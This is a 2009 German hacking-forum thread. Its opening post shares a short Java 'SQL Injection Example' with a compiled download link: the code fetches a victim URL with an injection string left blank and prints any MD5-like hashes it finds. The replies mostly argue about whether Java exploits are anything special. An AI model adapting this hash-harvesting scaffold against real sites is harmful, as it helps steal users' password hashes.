Es hat jemand geschafft einen Exploit zu programmieren unter Java :KA
Fertig compilt :Code:/* SQL Injection Example www.bifrostworld.org */ import java.net.*; import java.io.*; import java.util.regex.*; import java.util.*; import java.io.InputStream; class SQL { public static void main(String[] args){ //Host URl without http:// String host=""; //Injection goes here String inject = ""; String victim = "http://" + host + inject; try{ URL url = new URL(victim); URLConnection connect = url.openConnection(); InputStream in = connect.getInputStream(); Scanner s = new Scanner(in); while(s.hasNext()){ Pattern pat = Pattern.compile("([a-f0-9]{32})"); Matcher match = pat.matcher(s.next()); if(match.find()){ System.out.println(match.group()); }else{ System.out.println("No hash found"); } } }catch(Exception e){ System.out.println(e); } } }
http://ul.to/w4aghk
Screenshot :
Ergebnis 1 bis 10 von 17
-
02.05.2009, 12:17 #1Anfänger
- Registriert seit
- 15.11.2008
- Beiträge
- 22
Java einsetzen für Exploit Programmierung > Es klappt !
-
02.05.2009, 13:01 #2I'm in ur VM.
- Registriert seit
- 23.07.2007
- Beiträge
- 1.038
Und was ist daran nun so besonders? o0
I can haz RCE?
-
02.05.2009, 13:08 #3W32.SwineFlu
- Registriert seit
- 24.07.2008
- Beiträge
- 1.916
Ja und? Java hat Sockets, warum soll man da keine Exploits schreiben können?
-
02.05.2009, 13:17 #4Anfänger
- Registriert seit
- 15.11.2008
- Beiträge
- 22
Und warum gibt es sowas kaum?
-
02.05.2009, 13:19 #5Capt'n Crunch
- Registriert seit
- 08.11.2008
- Beiträge
- 964
Jop wäre doch besserer wenn es Exploits mit GUIs geäbe...
-
02.05.2009, 13:22 #6Anfänger
- Registriert seit
- 15.11.2008
- Beiträge
- 22
Es geht aber darum, dass es in Java geschrieben wurde. Außerdem ist es lediglich ein Beispiel wie sowas aussehen kann. Glaube kaum, dass sich hier einer jemals wirklich mit Java auseinander gesetzt hat, sondern einfach nur irgendwas daher redet.
-
02.05.2009, 13:38 #7Gesperrt
- Registriert seit
- 23.03.2009
- Beiträge
- 438
Ich Frage mich auch gerade was daran so besonders sein solle.
-
02.05.2009, 14:15 #8Emo Pwny
- Registriert seit
- 03.06.2007
- Beiträge
- 3.256
Ich find ohne GUI siehts besser aus.
Zitat von hackerking
Und was das besondere ist:
Ich denk einfach, dass es wenig Java Exploits gibt, und es daher etwas besonderes ist.
Boardregeln * Blackmarket * SuFu * Kontakt * PGP Key
..das Handy klingelt, sie fragen nach Kollegah
dem morgens schon Giorgi-Armani-Sakkoträger
heben Bares ab und zahlen, nehmen die Ware ab und gehen
es ist der Strassenapotheker
-
02.05.2009, 14:25 #9Kuschel-Wuschel enco
- Registriert seit
- 26.01.2006
- Beiträge
- 1.075
Ein Exploit in Ook oder Brainfuck wäre cool, aber an java finde ich nichts besonderes ...
-
02.05.2009, 14:33 #10Michelangelo Virus
- Registriert seit
- 29.06.2008
- Beiträge
- 273
JAVA != SOFORT GUI
könnt auch exploits mit gui in vb,perl,php,und whatever coden, eben alles was bibliotheken für guis bereitstellt
exploits sind im eigentlichen sinne, nur funktionsbeweiße zur ausnutzung einer Sicherheitslücke,.
Und da nimmt man eben eher Schnelle und verbreitete Script Sprachen wie z.B Perl oder PHP.
Wieso sollte jemand eine extra einen GUI für einen Proof of Concept bereitstellen.Geändert von int_main(); (02.05.2009 um 14:39 Uhr)
Zitieren
